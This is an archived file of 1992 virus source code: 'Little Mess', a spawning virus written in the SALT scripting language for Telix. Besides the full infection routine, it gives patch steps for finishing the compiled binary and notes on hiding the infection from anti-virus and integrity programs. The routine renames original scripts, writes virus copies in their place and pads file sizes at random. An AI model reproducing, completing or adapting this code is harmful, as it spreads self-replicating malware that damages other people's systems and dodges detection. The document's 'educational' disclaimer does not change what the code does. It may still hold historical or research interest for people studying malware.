💾 Archived View for spam.works › mirrors › textfiles › virus › ltlmess.slt captured on 2023-11-04 at 16:02:00.

View Raw

More Information

⬅️ Previous capture (2023-06-16)

-=-=-=-=-=-=-

// Little Mess spawning virus source (c) 92 Crom-Cruach/Trident
// Source in SALT
//
// The compiled script needs some little changes:
// *First, both 1234h's in the SLC must be replaced by (FileLen-011h)
// *the 1st 11h bytes of the script must be copied over the 'REPLACE ME!';
// *Both 1D 06 00's sequences MUST be replaced by 1D 02 00...

// This is of course only educational, and even if it wasn't, it still wouldn't
// spread due to the script exchange rate.
//
// Bad minds, however, might think it's fun having their local network-sysop
// screaming about his system being infected while all anti-viral/integrity
// programs miss it (or, him being dissed for saying he's got a
// script-virus)... Of course, those people are wrong and/or sick.

// Symptoms - 1 out of 8 times it displays a message for 1 sec after 
// script execution if all scripts infected.

// Greetz - NuKE / Phalcon/SKISM / YAM & All other practicing researchers...

// Technical info ---
//
// First, the uninfected file is renamed to *.SLX.
// Then, the SLC file is created and the copy of the header is written to it.
// After that, the whole virus is written as a string to the file (SALT-string
// identification code is 19h; offsets in SLC are calculated relative to the
// end of the header (= on +0Ch) - The 06 -> 02 patch changes the offset of the
// buffer to write from Title (+6) to [EndHeader+1] (+2)... The 1234-patch is
// needed to fill in the size of that string). After that, some random bytes
// are written to make the files less suspicious (the amount must be even; at
// least, CS (the TELIX script compiler) never creates files with odd lengths)
// I wanted to mark the SLX files as hidden; but in SALT you can only -read-
// the attribute of a file. Solution could be to write a little routine in ASM
// to a temporary file & to RUN that file; I decided not to, because the flash
// from the shell-to-dos is much more obvious than some 'SLX'-files.

// A system can be infected by starting this script from Telix. It will
// infect one script at a time.

int EndHeader = 0x123419;               // Needed for code-copy
str Title[40] = "[Little Mess (c) 92 Crom-Cruach/Trident]";
str Org_Ext[4] = ".SLX";

str Path[64],Trash[64];
str Buf[12] = "";                       // No script to start after 'mother'.
str Spawned_On[12];

// Header
str Header[17]="REPLACE ME!";           // must be replaced by header (debug)
int Handle;
main()
{
 Spawned_On = Buf;
 path = _script_dir;
 strcat(path,"*.SLC");                  // Search script (not 8 chars-FName!)
FNext:
 if (not FileFind(path,0,Buf))          // File found?
 { EndHeader=0; }                       // No more; mark 'all infected'
 else
 {
  path = "";                            // Prepare for find-next
  trash = _script_dir;
  strcat(trash,Buf);                    // Trash = path+filename+ext
  FNStrip(Trash,7,Buf);                 // Buf = filename only
  strcat(Buf,Org_Ext);                  // Give new extension
  if (frename(Trash,Buf) != 0) goto FNext;
                                        // File not renamed (already spawned)

  Handle = FOpen(Trash,"w");            // Make new file, same name
  If (Handle == 0)                      // Error opening; restore orig. fname
  {
    Path = _script_dir;
    strcat(path,Buf);                   // path = path+new_fname
    frename(Path,Trash);                // rename-back
    goto Quit_Infect;
  }
  FWrite(Header,17,Handle);             // Write header

  FWrite(Title,0x1234,Handle);       // Title REPLACED by (ofs EndH.+1)

  FWrite(Title,(CurTime()&254),Handle); // Make size random (must be even)
  FClose(Handle);
 }
Quit_Infect:
call(Spawned_On);                       // Start orig. script
if ((EndHeader==0) and                  // If all infected
 ((CurTime()&7)==7))                    // Show message 1 out of 8 times
  Status_Wind("Legalize Marijuana! - ??????",10);
}